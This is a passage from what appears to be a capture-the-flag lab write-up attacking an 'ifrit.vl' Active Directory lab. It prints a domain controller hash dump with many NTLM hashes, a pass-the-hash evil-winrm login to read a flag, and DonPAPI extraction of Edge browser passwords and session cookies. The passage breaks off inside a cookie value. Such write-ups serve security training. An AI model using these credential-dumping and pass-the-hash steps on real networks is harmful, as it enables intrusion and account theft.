NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Joseph.Carroll:1220:aad3b435b51404eeaad3b435b51404ee:3e657e1ba47e72dcc98b8ef22e6c94ee:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Abigail.Wallace:1221:aad3b435b51404eeaad3b435b51404ee:8e934b34cbdfab24a3c7fd81e93e5b16:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Henry.Adams:1222:aad3b435b51404eeaad3b435b51404ee:1402317cdd95e2fc5a061d7aedd18d2d:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Stewart.Armstrong:1223:aad3b435b51404eeaad3b435b51404ee:581e1cf57d1b23a726c926a86183539e:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Clare.Preston:1224:aad3b435b51404eeaad3b435b51404ee:98ac592a036af9c1a54e17eb777074f5:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Liam.Peters:1225:aad3b435b51404eeaad3b435b51404ee:dc04bc6730e3ff24517721cdbc022f35:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Ross.Scott:1226:aad3b435b51404eeaad3b435b51404ee:6e1ab34a31955aa22d527e5883a8ebc0:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Aimee.Elliott:1227:aad3b435b51404eeaad3b435b51404ee:70f63b3ceb67e566cf116c3bd12a8284:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Diana.James:1228:aad3b435b51404eeaad3b435b51404ee:405a4d457c7b82b8ed3e2b831504d967:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Anthony.Thompson:1229:aad3b435b51404eeaad3b435b51404ee:354fb2d5ce2405da932065d3b41eae1c:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Carolyn.Hunt:1230:aad3b435b51404eeaad3b435b51404ee:f8b97ade2948506ed6c577481bb264d5:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Hollie.White:1231:aad3b435b51404eeaad3b435b51404ee:13bf076b2cecbe5561e6bafdd08b4e0c:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Judith.Harris:1232:aad3b435b51404eeaad3b435b51404ee:2287ae90d51ba61976db0765b7d7ee0c:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Leanne.McCarthy:1233:aad3b435b51404eeaad3b435b51404ee:a9c09cd095d90031143b0b3429bd73a4:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Zoe.Adams:1234:aad3b435b51404eeaad3b435b51404ee:8f86947ae98683669b49a652037519ea:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Gerald.Foster:1235:aad3b435b51404eeaad3b435b51404ee:f653196a5fe2066afab44da784ac0514:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Marian.Campbell:1236:aad3b435b51404eeaad3b435b51404ee:26d0b86628f5956bf03e55888d76f6b8:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Leslie.Ingram:1237:aad3b435b51404eeaad3b435b51404ee:40280a085df8f53b2a32de21e8f66cc0:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Sally.Clayton:1238:aad3b435b51404eeaad3b435b51404ee:c60417bc9b17a2e9ce1eb26585b2d8c0:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Sarah.Bradley:1239:aad3b435b51404eeaad3b435b51404ee:57adace9490af5ccb4c075d913144409:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Frances.Freeman:1240:aad3b435b51404eeaad3b435b51404ee:2a0e42c3007a89c5fcc8c145aa718163:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Tina.Dawson:1241:aad3b435b51404eeaad3b435b51404ee:79e3a91df8b290d236be532c096db862:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Cheryl.Roberts:1242:aad3b435b51404eeaad3b435b51404ee:c55a6b140743f652357a82ec610ea425:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Vincent.Roberts:1243:aad3b435b51404eeaad3b435b51404ee:c0fa7ee32c0eb873c5225cd5968b6470:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Gavin.Dixon:1244:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Yvonne.Morris:1245:aad3b435b51404eeaad3b435b51404ee:1a57d4095d350f6c1f1db7f4a9102633:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Marion.Evans:1246:aad3b435b51404eeaad3b435b51404ee:bb46b293b27d229cf11af564ef530cec:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Lawrence.Stewart:1247:aad3b435b51404eeaad3b435b51404ee:6dc6e2f9b988116501efd9b619bc016f:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Daniel.Gibson:1248:aad3b435b51404eeaad3b435b51404ee:5ad78441ae86d5bf843a3fc4ceba80ca:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Keith.Howell:1249:aad3b435b51404eeaad3b435b51404ee:0e6b12f68e171adadb75a8cbb6e1cc29:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Denis.Wood:1250:aad3b435b51404eeaad3b435b51404ee:5686dc74261e457178b742e5c9c4e478:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Sophie.Webster:1251:aad3b435b51404eeaad3b435b51404ee:4df13b7830d3504eca1a298b1331ba6a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Katherine.Osborne:1252:aad3b435b51404eeaad3b435b51404ee:f999e6e35395c99c82a6fadc00ed5d0d:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Robert.Lewis:1253:aad3b435b51404eeaad3b435b51404ee:2a9ac80b24c17821aaa9ea5a5a241055:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Lauren.Young:1254:aad3b435b51404eeaad3b435b51404ee:a23e5813cb0d6c336e6dbcdbda329802:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Martin.James:1255:aad3b435b51404eeaad3b435b51404ee:284684373181f24fb51b1c1ad5ff8534:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Emma.Clark:1256:aad3b435b51404eeaad3b435b51404ee:809c55c236ff67d4e803040938f1dfd6:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Kim.Thomas:1257:aad3b435b51404eeaad3b435b51404ee:c184b6882834a720e410d0d1f19ecb35:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Philip.Smith:1258:aad3b435b51404eeaad3b435b51404ee:2bca532ce2d2509b6e7e9bcbdfae0e4a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Owen.Black:1259:aad3b435b51404eeaad3b435b51404ee:be4be89a2dcb409718a41b3bafd48a2b:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Glenn.Rogers:1260:aad3b435b51404eeaad3b435b51404ee:16b9fca5b0a9e070a4b7aac24796dd11:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Robin.Smith:1261:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Naomi.Harris:1262:aad3b435b51404eeaad3b435b51404ee:c84e3f68a97833056f8e8cc9599ad121:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Carolyn.Hughes:1263:aad3b435b51404eeaad3b435b51404ee:86aa5e50ed8398fe0c7ae5f1b13f1a9b:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Denise.Begum:1264:aad3b435b51404eeaad3b435b51404ee:21a5047a3e74537af5881e0d3dab6e1b:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Karen.Moore:1265:aad3b435b51404eeaad3b435b51404ee:681d5631b111d32c6f6c5e1a8e705ee2:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Richard.Lewis:1266:aad3b435b51404eeaad3b435b51404ee:dd56d7cf953268524179e9224601b196:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Marcus.Taylor:1267:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jacqueline.Morley:1268:aad3b435b51404eeaad3b435b51404ee:709bb201cb7311a64d43dabd860d0f75:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Kyle.Parker:1269:aad3b435b51404eeaad3b435b51404ee:52e67d68b82281dec5cb1ac6c947367d:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jane.Taylor:1270:aad3b435b51404eeaad3b435b51404ee:032188c234f8c012b1f51313a469165f:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Matthew.Craig:1271:aad3b435b51404eeaad3b435b51404ee:15d6065f4dc4ab36fdbeefc79d7dbd43:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Daniel.Clark:1272:aad3b435b51404eeaad3b435b51404ee:b5e9504fd2281ebbc31fdb14a5a14e28:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jemma.Smith:1273:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Richard.Riley:1274:aad3b435b51404eeaad3b435b51404ee:1a937ff5a91169d167bd0da1c4b4012a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Margaret.Patel:1275:aad3b435b51404eeaad3b435b51404ee:ae09c4f7957fb62197a818ce893a5816:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Anne.Mitchell:1276:aad3b435b51404eeaad3b435b51404ee:43c3eabac0da792cb9d4f7e34c2ba4d0:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Sophie.Powell:1277:aad3b435b51404eeaad3b435b51404ee:bdfb66713eec013e5ea848e1605df11f:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Marian.Baldwin:1278:aad3b435b51404eeaad3b435b51404ee:976ea01f4344e1d85e5a5a8c1fa4a06f:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Annette.King:1279:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Katy.Jones:1280:aad3b435b51404eeaad3b435b51404ee:a9e43537064023451ef83025fead6963:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Dorothy.Walsh:1281:aad3b435b51404eeaad3b435b51404ee:148af9ef5ddaa409f5bd8d3cb9d1f85a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Mohammed.Ward:1282:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\James.Marshall:1283:aad3b435b51404eeaad3b435b51404ee:cfec0b3613936175218d8844e751861f:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Callum.Brookes:1284:aad3b435b51404eeaad3b435b51404ee:78af5f1ce10ad538339ed31cfc551fe5:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Amy.Woods:1285:aad3b435b51404eeaad3b435b51404ee:b9da2018a107b229cdf3b4c9ddc243da:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Cameron.White:1286:aad3b435b51404eeaad3b435b51404ee:e6f6099e4c84721a495bde50f431fd93:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Nicole.Harrison:1287:aad3b435b51404eeaad3b435b51404ee:9604c40fcd37e5e201265e35ea4daaa5:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Laura.Yates:1288:aad3b435b51404eeaad3b435b51404ee:e77ac91229abd98b330282a0fc4bbcd9:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Kim.Lee:1289:aad3b435b51404eeaad3b435b51404ee:0cc08bce358b21a4e4dee935c45a5927:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Nicole.Lloyd:1290:aad3b435b51404eeaad3b435b51404ee:bccf0a6e860b60cb5ab8be89edd89bc8:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Mary.Andrews:1291:aad3b435b51404eeaad3b435b51404ee:a6222aa848556b2a2232f1ba8a873f65:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jasmine.Yates:1292:aad3b435b51404eeaad3b435b51404ee:5378f2fdf0dd8a8f7beb218e5f2175c8:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Andrea.Davies:1293:aad3b435b51404eeaad3b435b51404ee:b360287cd064c6b2360c2085e84688de:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Russell.Miller:1294:aad3b435b51404eeaad3b435b51404ee:63b4cfd0097f26a6a74f460aa92563d7:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Ben.Brown:1295:aad3b435b51404eeaad3b435b51404ee:3dbace87570d4f5e74b81228c78d4014:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Anthony.Smith:1296:aad3b435b51404eeaad3b435b51404ee:1da3d13df50d2a4e24a092ef5df6fc38:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Russell.Mistry:1297:aad3b435b51404eeaad3b435b51404ee:61cba3d3ef922370b03741e7e22682b0:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Laura.Robinson:1298:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Simon.Morris:1299:aad3b435b51404eeaad3b435b51404ee:0d3db2d9bf08b2d11efb2860bdd87849:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Aimee.Knight:1300:aad3b435b51404eeaad3b435b51404ee:375ac5cdaa5f0e01ad466383842db785:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Kieran.Parker:1301:aad3b435b51404eeaad3b435b51404ee:705da8767a12e2f7061ce27530afbc61:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Josephine.Evans:1302:aad3b435b51404eeaad3b435b51404ee:db9775bbf11beaff3d56ad6d3779bbbd:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Richard.Hutchinson:1303:aad3b435b51404eeaad3b435b51404ee:a4a1eb6af05d5117528a50095ff65fee:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Lucy.Richardson:1304:aad3b435b51404eeaad3b435b51404ee:c90c4dc4ea6039b7eaa5b8efb4672a3a:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Karl.Thomas:1305:aad3b435b51404eeaad3b435b51404ee:d67550b2e7afdae37091d187739f25a9:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Henry.Jordan:1306:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Bernard.Turner:1307:aad3b435b51404eeaad3b435b51404ee:ed4f286787a56ca7c3201ebec81cd8c1:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Leslie.Willis:1308:aad3b435b51404eeaad3b435b51404ee:4d7ec9f79477008bbe96d12c5acd5566:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Christopher.Smith:1309:aad3b435b51404eeaad3b435b51404ee:18f25bdd5553f98e38f5534e3170ad54:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Colin.Faulkner:1310:aad3b435b51404eeaad3b435b51404ee:d683ef889ae29da33a65ecedaee862a9:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Gerald.Murphy:1312:aad3b435b51404eeaad3b435b51404ee:928ea448d48833562ee2be6c7f83fa56:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jeremy.Austin:1313:aad3b435b51404eeaad3b435b51404ee:ce369a03d22fc23ab09f4027cb317bba:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Fiona.Marshall:1314:aad3b435b51404eeaad3b435b51404ee:6f7cfce257c1b333f02c9194a884f941:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Mohamed.Wright:1315:aad3b435b51404eeaad3b435b51404ee:0b160cd46cc5e2dd3bfe7a946c0412e3:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Stacey.Barrett:1316:aad3b435b51404eeaad3b435b51404ee:6574b5782fc8ec8385be447e8eebe537:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Gail.Joyce:1317:aad3b435b51404eeaad3b435b51404ee:f97d6e21364ac1069197d255f2abd9ec:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Marilyn.Sanderson:1318:aad3b435b51404eeaad3b435b51404ee:9ed0bc592136f15b389459f9fd89b5a3:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Gerard.Thomas:1319:aad3b435b51404eeaad3b435b51404ee:ad7c7d572efe1115accbc71620f2d44f:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Jack.Smith:1320:aad3b435b51404eeaad3b435b51404ee:85391f332fdaa3ad651cee1fe44aa90b:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\Patrick.Ford:1321:aad3b435b51404eeaad3b435b51404ee:e797860ef9c0c6916c17485a9b8ba40e:::
NTDSUTIL    172.16.41.14    445    DC03             IT-IFRIT$:1324:aad3b435b51404eeaad3b435b51404ee:a9027f0748f8301bf8be9c1cb66bf0ff:::
NTDSUTIL    172.16.41.14    445    DC03             RAS50014$:1325:aad3b435b51404eeaad3b435b51404ee:f9e0532f45153988279a5f75599f3cb7:::
NTDSUTIL    172.16.41.14    445    DC03             RAS50011$:1326:aad3b435b51404eeaad3b435b51404ee:01035198b4f8371ffebd0cda26d9ce2f:::
NTDSUTIL    172.16.41.14    445    DC03             RAS50021$:1327:aad3b435b51404eeaad3b435b51404ee:828b52d295f35cc005e1a8e590bfeff8:::
NTDSUTIL    172.16.41.14    445    DC03             RAS50005$:1328:aad3b435b51404eeaad3b435b51404ee:249be588ee3e58c92265f9d0e000b4e5:::
NTDSUTIL    172.16.41.14    445    DC03             gMSASQLService$:1331:aad3b435b51404eeaad3b435b51404ee:be04ac2797a0df5db949493fd6a71554:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\client-admin:1332:aad3b435b51404eeaad3b435b51404ee:38006da9f18e6151af19e7ea6ba26459:::
NTDSUTIL    172.16.41.14    445    DC03             eu-ifrit.vl\backup-admin:1333:aad3b435b51404eeaad3b435b51404ee:38006da9f18e6151af19e7ea6ba26459:::
NTDSUTIL    172.16.41.14    445    DC03             BACKUP01$:1336:aad3b435b51404eeaad3b435b51404ee:36d680786e43a9a7716653e55a0b8617:::
NTDSUTIL    172.16.41.14    445    DC03             [+] Dumped 230 NTDS hashes to /home/himitsu/.nxc/logs/DC03_172.16.41.14_2024-09-07_191036.ntds of which 215 were added to the database
NTDSUTIL    172.16.41.14    445    DC03             [*] To extract only enabled accounts from the output file, run the following command: 
NTDSUTIL    172.16.41.14    445    DC03             [*] grep -iv disabled /home/himitsu/.nxc/logs/DC03_172.16.41.14_2024-09-07_191036.ntds | cut -d ':' -f1

Found Administrator:d05ff1e30127c8d43e6b1ab5d22454c7

Current situation of achievements:

  • vdi02.eu-ifrit.vl » pwned
  • dc03.eu-ifrit.vl » pwned
  • git.ifrit.vl
  • dev05.eu-ifrit.vl » pwned
  • sql03.eu-ifrit.vl
  • sql07.it-ifrit.vl » pwned
  • fs02.it-ifrit.vl » pwned (but no flag found)
  • dc07.it-ifrit.vl » pwned

SQL03 - DA credentials reusing (Ifrit_Metal)

We got eu-ifrit.vl\Patrick.Ford:e797860ef9c0c6916c17485a9b8ba40e and we know that Patrick is a Domain Admin of EU-IFRIT.VL.

So we use it to connect via WinRM to SQL03 and get the 5th flag Ifrit_Metal):

$ evil-winrm -u 'patrick.ford' -H 'e797860ef9c0c6916c17485a9b8ba40e' -i sql03.eu-ifrit.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Patrick.Ford\Documents> dir ../../


    Directory: C:\Users


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         7/14/2024   6:43 AM                Administrator
d-----         7/14/2024   6:43 AM                administrator.EU-IFRIT
d-----         7/28/2024   7:32 AM                gMSASQLService$
d-----         9/13/2024   3:47 AM                Patrick.Ford
d-r---         7/14/2024   6:43 AM                Public


*Evil-WinRM* PS C:\Users\Patrick.Ford\Documents> dir ../../Administrator/Desktop


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/14/2024   6:06 AM             36 flag.txt
-a----          7/7/2024   4:59 AM           2308 Microsoft Edge.lnk


*Evil-WinRM* PS C:\Users\Patrick.Ford\Documents> type ../../Administrator/Desktop/flag.txt
VL{66cdfc153f3395a70182f3d60e294757}

VDI02 - Edge credentials dumping (IFRIT.VL\Administrator) (Ifrit_Master)

During previous enumeration, we saw that Patrick has been logged on VDI02 because of the

We use DonPAPI to dump Chromium browser Credentials, Cookies and Chrome Refresh Token:

$ donpapi collect -u 'patrick.ford' -H 'e797860ef9c0c6916c17485a9b8ba40e' --collectors Chromium --target vdi02.eu-ifrit.vl -d eu-ifrit.vl --dc-ip 172.16.41.14
[πŸ’€] [+] DonPAPI Version 2.0.1
[πŸ’€] [+] Output directory at /home/himitsu/.donpapi
[πŸ’€] [+] Loaded 1 targets
[πŸ’€] [+] Recover file available at /home/himitsu/.donpapi/recover/recover_1725973935
[vdi02.eu-ifrit.vl] [+] Starting gathering credz
[vdi02.eu-ifrit.vl] [+] Dumping SAM
[vdi02.eu-ifrit.vl] [$] [SAM] Got 4 accounts
[vdi02.eu-ifrit.vl] [+] Dumping LSA
[vdi02.eu-ifrit.vl] [+] Dumping User and Machine masterkeys
[vdi02.eu-ifrit.vl] [$] [DPAPI] Got 5 masterkeys
[vdi02.eu-ifrit.vl] [+] Dumping User Chromium Browsers
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Password] - admin:PWywZsXnsSht62cK
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .c.msn.com/ - ANONCHK:0
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .c.bing.com/ - MR:0
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .c.msn.com/ - MR:0
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .msn.com/ - OptanonConsent:isGpcEnabled=0&datestamp=Sun+Jul+14+2024+05%3A56%3A49+GMT-0700+(Pacific+Daylight+Time)&version=202310.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26firstlaunch%3D1&groups=C0001%3A1%2CC0003%3A0%2CC0002%3A0%2CC0004%3A0%2CV2STACK42%3A0
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .c.bing.com/ - SRM_B:1B80CF075EC468F228C4DBBB5FA96951
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .c.bing.com/ - SRM_M:1B80CF075EC468F228C4DBBB5FA96951
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .c.msn.com/ - SRM_M:1B80CF075EC468F228C4DBBB5FA96951
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .msn.com/ - _EDGE_V:1
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] .msn.com/edge - pglt-edgeChromium-dhp:547
[vdi02.eu-ifrit.vl] [$] [MSEDGE] [patrick.ford] [Cookie] pwm.ifrit.vl/ - .PleasantIdentity.ApplicationCookie:_mzgYifYx6L28xTbuDnflHHcbaVJyuNi-bn_YV8AwBjskTp09ZKDUKDYkQ1SxKoJc2hbfRK9RrPm-n5NR0QTUZSdvJ8n88gnigrIfr97CZCom9hvhTBCBZCZ1UDPZeGUhfwvTNbvIBlqYfZnFzzWOGtmj8WXq4p2msUZG6POiMdqSG8QGnoPRV-4-XhcK2fY5fD_I5J8nacWn8H0cspfrxMZSX5grsS_GP2PZpRj99vadClKMvb4s4YMZ_fEbwQ6_WRCfmLG3iYg8zA5pF4JXCs83FRiXz3Kq2IlZUncgnIO4MNPqQU-cIrFu9O-_TdLRYMNkrc9T-PtVDzPfnTiZRtee9PeBWzxnQIUHaKJ3zm8KHTUYqxEYVCbbZtm4q0D7KpQKi8yq_9h2sRLkvZQqKvS0CrmeEoqYXqOafQA4-dGFFxxGmYwl9JI2mE4j7VtacN5NGNeZ_oIBRYIEN6bvP44dihbIvvW4Q-3P9HpxuuNOnrcwafqgcCw7e39lnLXPqSs4Yz221-VfBlVZ_f3qS70PDXtXq5ZVxepl3C4yVVq98zIP9U2e3wP6udHkwy4P0fnKdvbz69SRBMuTLEuz8KP2ri4MTWhxV2hv-XSf4aY1yyozZ44szNtXKEk9s4Rrt43mcq3IybEvSNUOYWna8WJE0mhma5cI_jZm4iJK9upPMu5iP-nPmrSpb0lvK9amWkjByUlsl0quFxfB_Fug7P5P4eLGOWiHuiQzTXTZOdZRqk5qN7LWUlEPjqrkU5WoRw0MhhuYJccCiM__ULDwzl5zPcJFyxPUKV4k4liX5GEPExJVLSTigZuk63HTjaeWBceEKs5jXOlpZn2cvPK6JybHj3aKbZnMbRKCxgf1EUm-9LotEWvPARLdUnYE1ccOka5aWlLYdCySqfp-FjbJ3YY3pmJRSJISPXHnvnl8TRLdmyTJYJbVibbln_2nb2qk5VolxrJYML0Oe9U4PkXUO4QX4vjXZm2Ou8KOtF20y3ajJIu1_lVGsyvgcIuVLZNxpWIYbwq65U1FxAmzmhQfoSXi1OWUOLGi5f1EyG4KBjk2mw-I_bU0BxYox677gNTB4HY52FdfGRmjxMUanu48cRA-PwStzAGefSeuhcuvsTzMzqBtolqhJ-KgNz0ZNpHS0v1twppGL8hhfhnKNg7UW5LzcoVRljzaoCa243TE82ZCt4jqtPBlMsWeuAd4b-w5dGdinUpYMcIzh4FPwa4OtZhbOdDXCg3Y_HPcqWcFj5jUUSk3crm_CNeddqe-M7gE21Xs9qTYbJE3t0Ubp5FKttSuMqjm6M0aWG0jPtbqJ03zP0x0WxuzcAMCjOhMQP-xbZJoyVStbCOrOPI4lDu9IAOSrcHJ9n-Ojouv0sTTtVyE-Yt44ysJ6qp3k3jtM7_EL6uBG3DdVB_q1yxr02d-cJN04dD1ahqktI27Lf2aitkszhqxl7AokvQypemJKcCXIBLlWEsH46ByrWjoGsf5Zotq0AUkRaLzU5NIZfGZ33rN7ERsQi-aqtZu4Bqn2z3T-6WYAKpQkghAn7JQJUaOZsGfHSTjdtR855JBq8xU1orLl8twTnmkw2Yp9GZgc1Uukm7bJclvstulcWE3b_vXL09U_6ypSc35u9CwrkdWyA4ey1K3OphGT-Pk6fP4yOr6-KqERDkgMOxOHjYG7DkeWz3ar2eUQHPzQLEJqVEn_dLo5kNt2cXr-vmPJZnHwhpwyKlnFm65ogUfWpFpuX-rL1yNaqWWOYDVyv8dLd-Raj80PlvPVKlrMwgu4SVtT-z--c2dQoktpP3e2LHuvqoOCvr2e4m2M7XJjLYM5kxHqr36DnWkAZy4XgB34gqlCRnzY09NcsXqzuzF8x0I3ASROnZkR4INk8G3DD5SsjqEBkZpR3oBQBJ5WceVcddqzVx0cHrKEidzgRDQ_HgPiLDblxgD4JQuWffyZRIFuV1ruoUS2bQds3zA-ztumAbOFZq-s9By2gHW4RTbZOQ_4ok4Sdt03fdDS5LHOqNcw55GSkIVJpB4PAIY1BRU3oZ6Ub4zl50GfbYTPjpPVYVBIlitW0MjLSvwIO9Jc1tr5F4V7V3C2Cz9ifprRHXlo0UOhK3ZEwsfhuZFNRlaksCR7XtMswZglZowYLYzJHC2lG5og4PpJs6fbhV1xd5BCLMlu69lW8cdwN34rrt7mFeZdfRZFWWo3Fn6GVYQXyNpLt1tDWNux1heLR8DnbGMIBo1d6nwqebP9uVvEksEHMsWEX5lUS4NXwDkcBOFJk2DEvHqTnBWv04dE4MFov3Rcd0nscrfkc-anGa-LYbfohedpuYCsp0HLnlGzspH1VfxIFL6